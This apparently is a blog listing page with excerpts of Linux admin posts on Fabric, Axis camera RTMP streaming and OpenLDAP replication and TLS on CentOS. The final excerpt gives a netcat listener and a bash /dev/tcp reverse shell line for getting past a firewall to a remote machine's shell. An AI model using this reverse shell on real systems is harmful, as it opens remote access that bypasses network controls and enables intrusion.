Sometimes I need to use a one-off command for a simple task and end up wrapping the command in a for loop, calling ssh, and running the command over a few hosts. While this works great in a pinch, if I find myself using the same loop over and over I’ll create a new definition in Fabric.

If you’re unfamiliar with Fabric this post attempts to get you up to speed with the basics on how to use Fabric. First lets get Fabric installed.

1
2
3

apt-get install gcc python-setuptools python-crypto
easy_install pip
pip install fabric

Fabric uses Paramiko which is a Python interface for SSH. In the example fabfile below I’ll be logging into remote nodes over SSH so make sure you have your key-based or host-based authentication in place.

At this point we can create our first fabfile. I’m going to show you two basic but powerful features to get you started on your first fabfile. From this framework you should be able to start building a very nice fabfile to manage your nodes!

The beauty of Fabric is that it’s “just Python” so you’re free to do what you want with your fabfile.

These are some notes I took while integrating a solution providing live streaming of an Axis camera to a media server that converted the stream from rtsp to rtmp and was displayed on a website using flowplayer. The following technologies were used to accomplish this configuration:

• Axis Camera - http://www.axis.com/
• crtmpserver - http://www.rtmpd.com/
• Flowplayer - http://flowplayer.org/
• Flowplayer RTMP - http://flash.flowplayer.org/plugins/streaming/rtmp.html

I recently had a project where I needed to provide replication for a CentOS 5 LDAP server. The slave (consumer) was going to be running CentOS 6. This post assumes you already have (2) working LDAP servers, fully resolvable, and all ldapsearch queries respond appropriately.

For clarification:

Master (Provider in LDAP terms) - CentOS 5 server

Slave (Consumer in LDAP terms) - CentOS 6 server

On the Master:

Create a new account named replicate. Give the replicate account a password and make sure you can fully query the account from the Slave using ldapsearch.

An example ldapsearch to run from the Slave:

1

ldapsearch -h master.localdomain -p 389 -x -b "dc=localdomain,dc=com" -D "uid=replicate,ou=People,dc=localdomain,dc=com" -W

Add the following to slapd.conf on the Master

1
2
3
4
5
6
7
8

vi /etc/openldap/slapd.conf

sizelimit    100000

access to *
    by self write
    by dn="cn=replicate,ou=People,dc=localdomain,dc=com" read
    by * read

This post is an overview of the commands needed to setup a basic working LDAP TLS server using CentOS 6.4. I will also go over the process of creating a POSIX user account and a POSIX group. The archived version of this is for CentOS 6 and can be found here: CentOS 6 LDAP With TLS

Add the following to your iptables configuration to allow access through the firewall, then install the required packages for your LDAP server.

/etc/sysconfig/iptables

1
2
3
4
5
6

-A INPUT -m state --state NEW -m tcp -p tcp --dport 389 -j ACCEPT
-A INPUT -m state --state NEW -m tcp -p tcp --dport 636 -j ACCEPT

service iptables restart

yum install openldap-clients pam_ldap nss-pam-ldapd pam_krb5 sssd migrationtools openldap-servers openldap openldap-devel

Note: The steps for creating the certificates are crucial for TLS to work properly and have changed since CentOS 6.0

I wanted an easy way to get to the shell on my remote machine bypassing the firewall etc.

I’m going to refer to the systems as follows: OurSystem TargetSystem

On OurSystem we need to open a listening network connection using netcat. This can be any port we want, but I’m going to use port 443 because it’s allowed through firewalls.

1

nc -l 443

Note: Make sure the firewall isn’t blocking the listening port you choose on OurSystem

Next we need to force a bash shell back to OurSystem from TargetSystem. On the TargetSystem execute the following, substitute 12.3.4.5 with the external IP of OurSystem, substitute 443 with the port you set netcat to listen on.

1

bash -i >& /dev/tcp/12.3.4.5/443 0>&1

You should be greeted with a bash shell from TargetSystem on OurSystem.